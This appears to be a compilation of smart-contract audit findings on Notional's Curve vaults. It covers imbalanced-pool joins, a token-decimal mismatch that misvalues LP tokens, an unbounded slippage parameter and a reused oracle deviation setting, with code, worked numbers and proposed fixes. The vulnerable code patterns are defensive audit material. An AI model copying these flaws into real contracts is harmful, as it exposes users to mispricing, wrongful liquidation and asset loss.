secondaryPoolBalance\\n ) private pure {\\n uint256 totalAmount = primaryAmount + secondaryAmount;\\n uint256 totalPoolBalance = primaryPoolBalance + secondaryPoolBalance;\\n\\n uint256 primaryPercentage = primaryAmount * CurveConstants.CURVE_PRECISION / totalAmount; \\n uint256 expectedPrimaryPercentage = primaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedPrimaryPercentage, primaryPercentage);\\n\\n uint256 secondaryPercentage = secondaryAmount * CurveConstants.CURVE_PRECISION / totalAmount;\\n uint256 
expectedSecondaryPercentage = secondaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedSecondaryPercentage, secondaryPercentage);\\n }\\n```\\n\\nThis concept of proportional join appears to be taken from the design of earlier Notional's Balancer leverage vaults. For Balancer Pools, it is recommended to join with all the pool's tokens in exact proportions to minimize the price impact of the join (Reference).\\nHowever, the concept of proportional join to minimize slippage does not always hold for Curve Pools as they operate differently.\\nA Curve pool is considered imbalanced when there is an imbalance between the assets within it. For instance, the Curve stETH/ETH pool is considered imbalanced if it has the following reserves:\\nETH: 340,472.34 (31.70%)\\nstETH: 733,655.65 (68.30%)\\nIf a Curve Pool is imbalanced, attempting to perform a proportional join will not give an optimal return (e.g. result in fewer Pool LP tokens received).\\nIn Curve Pool, there are penalties/bonuses when depositing to a pool. The pools are always trying to balance themselves. If a deposit helps the pool to reach that desired balance, a deposit bonus will be given (receive extra tokens). 
On the other hand, if a deposit deviates from the pool from the desired balance, a deposit penalty will be applied (receive fewer tokens).\\n```\\ndef add_liquidity(amounts: uint256[N_COINS], min_mint_amount: uint256) -> uint256:\\n..SNIP..\\n if token_supply > 0:\\n # Only account for fees if we are not the first to deposit\\n fee: uint256 = self.fee * N_COINS / (4 * (N_COINS - 1))\\n admin_fee: uint256 = self.admin_fee\\n for i in range(N_COINS):\\n ideal_balance: uint256 = D1 * old_balances[i] / D0\\n difference: uint256 = 0\\n if ideal_balance > new_balances[i]:\\n difference = ideal_balance - new_balances[i]\\n else:\\n difference = new_balances[i] - ideal_balance\\n fees[i] = fee * difference / FEE_DENOMINATOR\\n if admin_fee != 0:\\n self.admin_balances[i] += fees[i] * admin_fee / FEE_DENOMINATOR\\n new_balances[i] -= fees[i]\\n D2 = self.get_D(new_balances, amp)\\n mint_amount = token_supply * (D2 - D0) / D0\\n else:\\n mint_amount = D1 # Take the dust if there was any\\n..SNIP..\\n```\\n\\nFollowing is the mathematical explanation of the penalties/bonuses extracted from Curve's Discord channel:\\nThere is a “natural” amount of D increase that corresponds to a given total deposit amount; when the pool is perfectly balanced, this D increase is optimally achieved by a balanced deposit. Any other deposit proportions for the same total amount will give you less D.\\nHowever, when the pool is imbalanced, a balanced deposit is no longer optimal for the D increase.
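A simplified Python model of `_checkPrimarySecondaryRatio` (hypothetical 5% deviation limit, plain fractions instead of 1e18 fixed-point) shows how the proportional-join requirement forces reinvestment to mirror the pool's imbalance:

```python
DEVIATION_LIMIT = 0.05  # hypothetical price-limit tolerance of 5%

def ratio_check_passes(primary_amt, secondary_amt, primary_pool, secondary_pool):
    actual = primary_amt / (primary_amt + secondary_amt)
    expected = primary_pool / (primary_pool + secondary_pool)
    return abs(actual - expected) <= DEVIATION_LIMIT * expected

# Imbalanced stETH/ETH pool from the example: ~31.7% ETH / ~68.3% stETH.
ETH_RESERVE, STETH_RESERVE = 340_472, 733_655

# Only a deposit mirroring the imbalance is accepted...
print(ratio_check_passes(31.7, 68.3, ETH_RESERVE, STETH_RESERVE))  # True

# ...while a pool-rebalancing 50/50 deposit (which would earn Curve's
# deposit bonus) is rejected.
print(ratio_check_passes(50, 50, ETH_RESERVE, STETH_RESERVE))      # False
```

So the very deposits that would minimize the penalty or capture the bonus are exactly the ones the ratio check reverts.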
Consider removing the `_checkPrimarySecondaryRatio` function from the `_validateSpotPriceAndPairPrice` function to give the callers the option to deposit the reward tokens in a "non-proportional" manner if a Curve Pool becomes imbalanced so that the deposit penalty could be minimized or the deposit bonus can be exploited to increase the return.
There is no guarantee that a Curve Pool will always be balanced. Historically, there are multiple instances where the largest Curve pool (stETH/ETH) becomes imbalanced (Reference #1 and #2).\\nIf the pool is imbalanced due to unexpected circumstances, performing a proportional deposit is not optimal, leading to the trade resulting in fewer tokens than possible due to the deposit penalty. In addition, the trade also misses out on the potential gain from the deposit bonus.\\nThe side-effect is that reinvesting the reward tokens will result in fewer pool tokens in return due to sub-optimal trade, eventually leading to a loss of gain for the vault shareholder.
```\\nFile: Curve2TokenConvexHelper.sol\\n function reinvestReward(\\n Curve2TokenConvexStrategyContext calldata context,\\n ReinvestRewardParams calldata params\\n ) external {\\n..SNIP..\\n // Make sure we are joining with the right proportion to minimize slippage\\n poolContext._validateSpotPriceAndPairPrice({\\n strategyContext: strategyContext,\\n oraclePrice: poolContext.basePool._getOraclePairPrice(strategyContext),\\n primaryAmount: primaryAmount,\\n secondaryAmount: secondaryAmount\\n });\\n```\\n
Curve vault will undervalue or overvalue the LP Pool tokens if it comprises tokens with different decimals
high
A Curve vault that comprises tokens with different decimals will undervalue or overvalue the LP Pool tokens. As a result, users might be liquidated prematurely or be able to borrow more than they are allowed. Additionally, the vault settlement process might break.\\nThe `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function, which is utilized by the Curve vault, is used to compute the total value of the LP Pool tokens (poolClaim) denominated in the primary token.\\n```\\nFile: TwoTokenPoolUtils.sol\\n function _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n ) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n\\n // Make sure primaryAmount is reported in primaryPrecision\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n }\\n```\\n\\nIf a leverage vault supports a Curve Pool that contains two tokens with different decimals, the math within the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function would not work, and the value returned from it will be incorrect. Consider the following two scenarios:\\nIf primary token's decimals (e.g. 
18) > secondary token's decimals (e.g. 6)\\nTo illustrate the issue, assume the following:\\nThe leverage vault supports the DAI-USDC Curve Pool, and its primary token of the vault is DAI.\\nDAI's decimals are 18, while USDC's decimals are 6.\\nCurve Pool's total supply is 100\\nThe Curve Pool holds 100 DAI and 100 USDC\\nFor the sake of simplicity, the price of DAI and USDC is 1:1. Thus, the `oraclePrice` within the function will be `1 * 10^18`. Note that the oracle price is always scaled up to 18 decimals within the vault.\\nThe caller of the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function wanted to compute the total value of 50 LP Pool tokens.\\n```\\nprimaryBalance = poolContext.primaryBalance * poolClaim / totalSupply; // 100 DAI * 50 / 100\\nsecondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply; // 100 USDC * 50 / 100\\n```\\n\\nThe `primaryBalance` will be `50 DAI`. `50 DAI` denominated in WEI will be `50 * 10^18` since the decimals of DAI are 18.\\nThe `secondaryBalance` will be `50 USDC`. `50 USDC` denominated in WEI will be `50 * 10^6` since the decimals of USDC are 6.\\nNext, the code logic attempts to value the secondary balance (50 USDC) in terms of the primary token (DAI) using the oracle price (1 * 10^18).\\n```\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = 50 USDC * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n```\\n\\n50 USDC should be worth 50 DAI (50 * 10^18). 
However, the `secondaryAmountInPrimary` shows that it is only worth 0.00000000005 DAI (50 * 10^6).\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\nprimaryAmount = [(50 * 10^18) + (50 * 10^6)] * 10^18 / 10^18\\nprimaryAmount = [(50 * 10^18) + (50 * 10^6)] // cancel out the 10^18\\nprimaryAmount = 50 DAI + 0.00000000005 DAI = 50.00000000005 DAI\\n```\\n\\n50 LP Pool tokens should be worth 100 DAI. However, the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function shows that it is only worth 50.00000000005 DAI, which undervalues the LP Pool tokens.\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18)\\nTo illustrate the issue, assume the following:\\nThe leverage vault supports the DAI-USDC Curve Pool, and its primary token of the vault is USDC.\\nUSDC's decimals are 6, while DAI's decimals are 18.\\nCurve Pool's total supply is 100\\nThe Curve Pool holds 100 USDC and 100 DAI\\nFor the sake of simplicity, the price of DAI and USDC is 1:1. Thus, the `oraclePrice` within the function will be `1 * 10^18`. Note that the oracle price is always scaled up to 18 decimals within the vault.\\nThe caller of the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function wanted to compute the total value of 50 LP Pool tokens.\\n```\\nprimaryBalance = poolContext.primaryBalance * poolClaim / totalSupply; // 100 USDC * 50 / 100\\nsecondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply; // 100 DAI * 50 / 100\\n```\\n\\nThe `primaryBalance` will be `50 USDC`. `50 USDC` denominated in WEI will be `50 * 10^6` since the decimals of USDC are 6.\\nThe `secondaryBalance` will be `50 DAI`. 
`50 DAI` denominated in WEI will be `50 * 10^18` since the decimals of DAI are 18.\\nNext, the code logic attempts to value the secondary balance (50 DAI) in terms of the primary token (USDC) using the oracle price (1 * 10^18).\\n```\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = 50 DAI * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^18\\n```\\n\\n50 DAI should be worth 50 USDC (50 * 10^6). However, the `secondaryAmountInPrimary` shows that it is worth 50,000,000,000,000 USDC (50 * 10^18).\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\nprimaryAmount = [(50 * 10^6) + (50 * 10^18)] * 10^6 / 10^18\\nprimaryAmount = [(50 * 10^6) + (50 * 10^18)] / 10^12\\nprimaryAmount = 50,000,000.00005 = 50 million\\n```\\n\\n50 LP Pool tokens should be worth 100 USDC. However, the `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function shows that it is worth 50 million USDC, which overvalues the LP Pool tokens.\\nIn summary, if a leverage vault has two tokens with different decimals:\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g. 6), then `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function will undervalue the LP Pool tokens\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18), then `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function will overvalue the LP Pool tokens
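The two walkthroughs above can be reproduced with integer arithmetic. A minimal Python sketch of the flawed formula (names mirror the Solidity; the 1:1 oracle price and pool state are taken from the examples, and `poolClaimPrecision` is Curve's 1e18):

```python
POOL_CLAIM_PRECISION = 10**18  # CurveConstants.CURVE_PRECISION
ORACLE_PRICE = 1 * 10**18      # 1:1 pair price, scaled to 18 decimals


def flawed_primary_amount(primary_pool_balance, secondary_pool_balance,
                          primary_decimals, pool_claim, total_supply):
    primary_balance = primary_pool_balance * pool_claim // total_supply
    secondary_balance = secondary_pool_balance * pool_claim // total_supply
    secondary_in_primary = secondary_balance * POOL_CLAIM_PRECISION // ORACLE_PRICE
    primary_precision = 10 ** primary_decimals
    # Bug: the two operands of the addition are in different decimals
    return (primary_balance + secondary_in_primary) * primary_precision // POOL_CLAIM_PRECISION


# Primary = DAI (18 decimals), pool = 100 DAI + 100 USDC, claim 50 of 100 LP tokens:
# returns 50 DAI + 0.00000000005 DAI instead of the expected 100 DAI
dai_value = flawed_primary_amount(100 * 10**18, 100 * 10**6, 18, 50, 100)

# Primary = USDC (6 decimals): raw result is 50,000,000.00005,
# which differs from the expected 100 USDC (100 * 10**6 in base units)
usdc_value = flawed_primary_amount(100 * 10**6, 100 * 10**18, 6, 50, 100)
```

In both configurations the result disagrees with the true pool share, confirming that the formula cannot handle mixed decimals.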
When valuing the secondary balance in terms of the primary token using the oracle price, the result should be scaled up or down the decimals of the primary token accordingly if the decimals of the two tokens are different.\\nThe root cause of this issue is in the following portion of the code, which attempts to add the `primaryBalance` and `secondaryAmountInPrimary` before multiplying with the `primaryPrecision`. The `primaryBalance` and `secondaryAmountInPrimary` might not be denominated in the same decimals. Therefore, they cannot be added together without scaling them if the decimals of two tokens are different.\\n```\\nprimaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n```\\n\\nConsider implementing the following changes to ensure that the math within the `_getTimeWeightedPrimaryBalance` function work with tokens with different decimals. The below approach will scale the secondary token to match the primary token's precision before performing further computation.\\n```\\nfunction _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n// Add the line below\\n // Scale secondary balance to primaryPrecision\\n// Add the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Add the line below\\n uint256 secondaryPrecision = 10 ** 
poolContext.secondaryDecimals;\\n// Add the line below\\n secondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision;\\n \\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n \\n// Remove the line below\\n // Make sure primaryAmount is reported in primaryPrecision\\n// Remove the line below\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n// Remove the line below\\n primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n// Add the line below\\n primaryAmount = primaryBalance + secondaryAmountInPrimary;\\n}\\n```\\n\\nThe `poolContext.primaryBalance` and `poolClaim` are not scaled up to `strategyContext.poolClaimPrecision`, so the `primaryBalance` is not scaled in any form. Hence, there is no need to perform any conversion at the last line of the `_getTimeWeightedPrimaryBalance` function.\\n```\\nuint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n```\\n\\nThe following runs through the examples in the previous section, showing that the updated function produces valid results after the changes.\\nIf primary token's decimals (e.g. 18) > secondary token's decimals (e.g.
6)\\n```\\nPrimary Balance = 50 DAI (18 Deci), Secondary Balance = 50 USDC (6 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 USDC * 10^18 / 10^6\\nsecondaryBalance = (50 * 10^6) * 10^18 / 10^6 = (50 * 10^18)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^18) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^18\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^18) + (50 * 10^18) = (100 * 10^18) = 100 DAI\\n```\\n\\nIf primary token's decimals (e.g. 6) < secondary token's decimals (e.g. 18)\\n```\\nPrimary Balance = 50 USDC (6 Deci), Secondary Balance = 50 DAI (18 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 DAI * 10^6 / 10^18\\nsecondaryBalance = (50 * 10^18) * 10^6 / 10^18 = (50 * 10^6)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^6) + (50 * 10^6) = (100 * 10^6) = 100 USDC\\n```\\n\\nIf primary token's decimals (e.g. 6) == secondary token's decimals (e.g. 
6)\\n```\\nPrimary Balance = 50 USDC (6 Deci), Secondary Balance = 50 USDT (6 Deci)\\n\\nsecondaryBalance = secondaryBalance * primaryPrecision / secondaryPrecision\\nsecondaryBalance = 50 USDT * 10^6 / 10^6\\nsecondaryBalance = (50 * 10^6) * 10^6 / 10^6 = (50 * 10^6)\\n\\nsecondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = (50 * 10^6) * 10^18 / (1 * 10^18)\\nsecondaryAmountInPrimary = 50 * 10^6\\n\\nprimaryAmount = primaryBalance + secondaryAmountInPrimary\\nprimaryAmount = (50 * 10^6) + (50 * 10^6) = (100 * 10^6) = 100 USDC\\n```\\n\\n`strategyContext.poolClaimPrecision` set to `CurveConstants.CURVE_PRECISION`, which is `1e18`. `oraclePrice` is always in `1e18` precision.
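The three checks above can be bundled into a single Python sketch of the patched formula (same assumed pool states and 1:1 oracle price; names mirror the Solidity):

```python
POOL_CLAIM_PRECISION = 10**18  # CurveConstants.CURVE_PRECISION
ORACLE_PRICE = 1 * 10**18      # 1:1 pair price, scaled to 18 decimals


def fixed_primary_amount(primary_pool_balance, secondary_pool_balance,
                         primary_decimals, secondary_decimals,
                         pool_claim, total_supply):
    primary_balance = primary_pool_balance * pool_claim // total_supply
    secondary_balance = secondary_pool_balance * pool_claim // total_supply
    # Fix: scale the secondary balance to the primary token's precision first
    secondary_balance = secondary_balance * 10**primary_decimals // 10**secondary_decimals
    secondary_in_primary = secondary_balance * POOL_CLAIM_PRECISION // ORACLE_PRICE
    return primary_balance + secondary_in_primary


# 100/100 pool, claiming 50 of 100 LP tokens in each configuration:
assert fixed_primary_amount(100 * 10**18, 100 * 10**6, 18, 6, 50, 100) == 100 * 10**18  # DAI primary
assert fixed_primary_amount(100 * 10**6, 100 * 10**18, 6, 18, 50, 100) == 100 * 10**6   # USDC primary
assert fixed_primary_amount(100 * 10**6, 100 * 10**6, 6, 6, 50, 100) == 100 * 10**6     # equal decimals
```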
A vault supporting tokens with two different decimals will undervalue or overvalue the LP Pool tokens.\\nThe affected `TwoTokenPoolUtils._getTimeWeightedPrimaryBalance` function is called within the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function that is used for valuing strategy tokens in terms of the primary balance. As a result, the strategy tokens will be overvalued or undervalued\\nFollowing are some of the impacts of this issue:\\nIf the strategy tokens are overvalued or undervalued, the users might be liquidated prematurely or be able to borrow more than they are allowed to since the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function is indirectly used for computing the collateral ratio of an account within Notional's `VaultConfiguration.calculateCollateralRatio` function.\\n`expectedUnderlyingRedeemed` is computed based on the `Curve2TokenPoolUtils._convertStrategyToUnderlying` function. If the `expectedUnderlyingRedeemed` is incorrect, it will break the vault settlement process.
```\\nFile: TwoTokenPoolUtils.sol\\n function _getTimeWeightedPrimaryBalance(\\n TwoTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n uint256 poolClaim,\\n uint256 oraclePrice,\\n uint256 spotPrice\\n ) internal view returns (uint256 primaryAmount) {\\n // Make sure spot price is within oracleDeviationLimit of pairPrice\\n strategyContext._checkPriceLimit(oraclePrice, spotPrice);\\n \\n // Get shares of primary and secondary balances with the provided poolClaim\\n uint256 totalSupply = poolContext.poolToken.totalSupply();\\n uint256 primaryBalance = poolContext.primaryBalance * poolClaim / totalSupply;\\n uint256 secondaryBalance = poolContext.secondaryBalance * poolClaim / totalSupply;\\n\\n // Value the secondary balance in terms of the primary token using the oraclePairPrice\\n uint256 secondaryAmountInPrimary = secondaryBalance * strategyContext.poolClaimPrecision / oraclePrice;\\n\\n // Make sure primaryAmount is reported in primaryPrecision\\n uint256 primaryPrecision = 10 ** poolContext.primaryDecimals;\\n primaryAmount = (primaryBalance + secondaryAmountInPrimary) * primaryPrecision / strategyContext.poolClaimPrecision;\\n }\\n```\\n
`oracleSlippagePercentOrLimit` can exceed the `Constants.SLIPPAGE_LIMIT_PRECISION`
medium
A trade might be settled with large slippage, causing a loss of assets, as the `oracleSlippagePercentOrLimit` limit is not bounded and can exceed the `Constants.SLIPPAGE_LIMIT_PRECISION` threshold.\\nThe code at Lines 73-75 only checks if the `oracleSlippagePercentOrLimit` is within the `Constants.SLIPPAGE_LIMIT_PRECISION` if `useDynamicSlippage` is `true`. If the trade is performed without dynamic slippage, the trade can be executed with an arbitrary limit.\\n```\\nFile: StrategyUtils.sol\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n }\\n\\n // Sell residual secondary balance\\n Trade memory trade = Trade(\\n params.tradeType,\\n sellToken,\\n buyToken,\\n amount,\\n useDynamicSlippage ? 0 : params.oracleSlippagePercentOrLimit,\\n block.timestamp, // deadline\\n params.exchangeData\\n );\\n```\\n\\nThe `StrategyUtils._executeTradeExactIn` function is utilized by the Curve Vault.
Consider restricting the slippage limit when a trade is executed without dynamic slippage.\\n```\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n// Remove the line below\\n }\\n// Add the line below\\n } else {\\n// Add the line below\\n require(params.oracleSlippagePercentOrLimit != 0 && params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION_FOR_NON_DYNAMIC_TRADE);\\n// Add the line below\\n } \\n```\\n
A trade might be settled with large slippage, causing a loss of assets.
```\\nFile: StrategyUtils.sol\\n function _executeTradeExactIn(\\n TradeParams memory params,\\n ITradingModule tradingModule,\\n address sellToken,\\n address buyToken,\\n uint256 amount,\\n bool useDynamicSlippage\\n ) internal returns (uint256 amountSold, uint256 amountBought) {\\n require(\\n params.tradeType == TradeType.EXACT_IN_SINGLE || params.tradeType == TradeType.EXACT_IN_BATCH\\n );\\n if (useDynamicSlippage) {\\n require(params.oracleSlippagePercentOrLimit <= Constants.SLIPPAGE_LIMIT_PRECISION);\\n }\\n\\n // Sell residual secondary balance\\n Trade memory trade = Trade(\\n params.tradeType,\\n sellToken,\\n buyToken,\\n amount,\\n useDynamicSlippage ? 0 : params.oracleSlippagePercentOrLimit,\\n block.timestamp, // deadline\\n params.exchangeData\\n );\\n```\\n
Oracle slippage rate is used for checking primary and secondary ratio
medium
The oracle slippage rate (oraclePriceDeviationLimitPercent) is used for checking the ratio of the primary and secondary tokens to be deposited into the pool.\\nAs a result, changing the `oraclePriceDeviationLimitPercent` setting to increase or decrease the allowable slippage between the spot and oracle prices can cause unexpected side-effects in the `_checkPrimarySecondaryRatio` function, which might break the `reinvestReward` function that relies on the `_checkPrimarySecondaryRatio` function under certain conditions.\\nThe `_checkPriceLimit` function exists to compare the spot price with the oracle price. Thus, the slippage (oraclePriceDeviationLimitPercent) is specially selected for this purpose.\\n```\\nFile: StrategyUtils.sol\\n function _checkPriceLimit(\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 poolPrice\\n ) internal pure {\\n uint256 lowerLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS - strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS + strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n\\n if (poolPrice < lowerLimit || upperLimit < poolPrice) {\\n revert Errors.InvalidPrice(oraclePrice, poolPrice);\\n }\\n }\\n```\\n\\nHowever, it was observed that the `_checkPriceLimit` function is repurposed for checking if the ratio of the primary and secondary tokens to be deposited to the pool is more or less proportional to the pool's balances within the `_checkPrimarySecondaryRatio` function during reinvestment.\\nThe `oraclePriceDeviationLimitPercent` setting should not be used here as it does not involve any oracle data. 
Thus, the correct way is to define another setting specifically for checking if the ratio of the primary and secondary tokens to be deposited to the pool is more or less proportional to the pool's balances.\\n```\\nFile: Curve2TokenPoolUtils.sol\\n function _checkPrimarySecondaryRatio(\\n StrategyContext memory strategyContext,\\n uint256 primaryAmount, \\n uint256 secondaryAmount, \\n uint256 primaryPoolBalance, \\n uint256 secondaryPoolBalance\\n ) private pure {\\n uint256 totalAmount = primaryAmount + secondaryAmount;\\n uint256 totalPoolBalance = primaryPoolBalance + secondaryPoolBalance;\\n\\n uint256 primaryPercentage = primaryAmount * CurveConstants.CURVE_PRECISION / totalAmount; \\n uint256 expectedPrimaryPercentage = primaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedPrimaryPercentage, primaryPercentage);\\n\\n uint256 secondaryPercentage = secondaryAmount * CurveConstants.CURVE_PRECISION / totalAmount;\\n uint256 expectedSecondaryPercentage = secondaryPoolBalance * CurveConstants.CURVE_PRECISION / totalPoolBalance;\\n\\n strategyContext._checkPriceLimit(expectedSecondaryPercentage, secondaryPercentage);\\n }\\n```\\n
There is a difference between the slippage for the following two items:\\nAllowable slippage between the spot price and oracle price\\nAllowable slippage between the ratio of the primary and secondary tokens to be deposited to the pool against the pool's balances\\nSince they serve a different purposes, they should not share the same slippage. Consider defining a separate slippage setting and function for checking if the ratio of the primary and secondary tokens deposited to the pool is more or less proportional to the pool's balances.
Changing the `oraclePriceDeviationLimitPercent` setting to increase or decrease the allowable slippage between the spot price and oracle price can cause unexpected side-effects in the `_checkPrimarySecondaryRatio` function, which might break the `reinvestReward` function that relies on the `_checkPrimarySecondaryRatio` function under certain conditions.\\nAdditionally, the value chosen for `oraclePriceDeviationLimitPercent` is tailored to comparing the spot price with the oracle price. Thus, it might not be the optimal value for checking whether the ratio of the primary and secondary tokens deposited to the pool is more or less proportional to the pool's balances.
```\\nFile: StrategyUtils.sol\\n function _checkPriceLimit(\\n StrategyContext memory strategyContext,\\n uint256 oraclePrice,\\n uint256 poolPrice\\n ) internal pure {\\n uint256 lowerLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS - strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n uint256 upperLimit = (oraclePrice * \\n (VaultConstants.VAULT_PERCENT_BASIS + strategyContext.vaultSettings.oraclePriceDeviationLimitPercent)) / \\n VaultConstants.VAULT_PERCENT_BASIS;\\n\\n if (poolPrice < lowerLimit || upperLimit < poolPrice) {\\n revert Errors.InvalidPrice(oraclePrice, poolPrice);\\n }\\n }\\n```\\n
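The coupling can be seen numerically. This is a minimal Python sketch of `_checkPriceLimit` (assuming `VAULT_PERCENT_BASIS = 10**4`, so a 1% deviation limit is 100): the same `oraclePriceDeviationLimitPercent` that sensibly bounds a spot-vs-oracle comparison also rejects any reward deposit whose token ratio strays more than ~1% from the pool's composition.

```python
VAULT_PERCENT_BASIS = 10**4  # assumed, per VaultConstants


def check_price_limit(oracle_price, pool_price, deviation_limit_percent):
    """Mirror of _checkPriceLimit: True if pool_price is inside the band."""
    lower = oracle_price * (VAULT_PERCENT_BASIS - deviation_limit_percent) // VAULT_PERCENT_BASIS
    upper = oracle_price * (VAULT_PERCENT_BASIS + deviation_limit_percent) // VAULT_PERCENT_BASIS
    return lower <= pool_price <= upper


LIMIT = 100  # a hypothetical 1% oraclePriceDeviationLimitPercent

# Intended use: a spot price within 1% of the oracle price passes
assert check_price_limit(10**18, 1005 * 10**15, LIMIT)

# Repurposed use in _checkPrimarySecondaryRatio: a 50/50 reward deposit into a
# 60/40 pool is rejected, even though no oracle data is involved
assert not check_price_limit(6 * 10**17, 5 * 10**17, LIMIT)
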